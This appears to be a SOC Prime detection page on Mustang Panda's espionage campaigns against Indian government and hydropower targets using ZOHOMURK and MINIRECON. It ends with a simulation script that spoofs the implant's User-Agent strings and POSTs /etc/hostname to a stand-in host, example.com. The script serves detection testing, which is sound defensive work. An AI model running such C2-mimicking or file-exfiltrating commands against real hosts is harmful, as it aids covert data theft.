SOC Prime Bias: High

06 Jul 2026 21:57 UTC

Mustang Panda Uses ZOHOMURK and MINIRECON Against India’s Government and Energy Sectors

Author Photo
SOC Prime Team linkedin icon Follow
Mustang Panda Uses ZOHOMURK and MINIRECON Against India’s Government and Energy Sectors
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Mustang Panda is carrying out espionage operations targeting India’s government and hydropower sectors. The group is using an updated malware toolkit that includes SHARDLOADER, MINIRECON, and ZOHOMURK. One of its notable techniques is the abuse of Zoho WorkDrive for command-and-control and data exfiltration.

Investigation

Acronis TRU identified two parallel campaigns that used spear-phishing lures themed around India-Taiwan cooperation. Researchers found DLL sideloading through legitimate Solid PDF Creator binaries and analyzed the new ZOHOMURK and MINIRECON implants. The investigation was also conducted in coordination with CERT-In to support defensive action.

Mitigation

Organizations should monitor for unusual activity involving cloud platforms, especially unauthorized use of Zoho WorkDrive. EDR and XDR solutions should be tuned to detect DLL sideloading and suspicious registry-based persistence. Visibility into non-browser processes making HTTPS or WebSocket connections to cloud services is also essential.

Response

If this activity is detected, affected systems should be isolated immediately to stop further exfiltration through cloud APIs. Investigators should perform forensic analysis on staging paths such as C:\ProgramData\IDM\logs or %LOCALAPPDATA%\Microsoft\Vault\Cache. Registry Run keys and scheduled tasks should also be reviewed for unauthorized persistence.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary has successfully established a foothold and is attempting to initiate Command-and-Control (C2) communications. To masquerade as legitimate business traffic, the ZOHOMURK implant attempts to communicate with its controller by mimicking Zoho WorkDrive API calls. The attacker uses a specific, hardcoded User-Agent string (Zoho Client/1.0) to pass through certain network filters, hoping to blend in with legitimate cloud productivity traffic. This action will generate a proxy log entry containing the target User-Agent, thereby triggering the detection rule.

  • Regression Test Script:

    #!/bin/bash
    # Simulation of ZOHOMURK C2 via User-Agent spoofing
    # Target 1: Imitating Zoho Client
    echo "[+] Simulating ZOHOMURK: Zoho Client/1.0"
    curl -A "Zoho Client/1.0" http://example.com/api/v1/sync
    
    # Target 2: Imitating IPFetcher
    echo "[+] Simulating ZOHOMURK: IPFetcher/1.0"
    curl -A "IPFetcher/1.0" http://example.com/checkip
    
    # Target 3: Imitating Multipart POST User-Agent
    echo "[+] Simulating ZOHOMURK: Multipart POST"
    curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload
  • Cleanup Commands:

    # No persistent artifacts are created on the system by this network-based simulation.
    # Simply ensure no background curl processes are running.
    pkill curl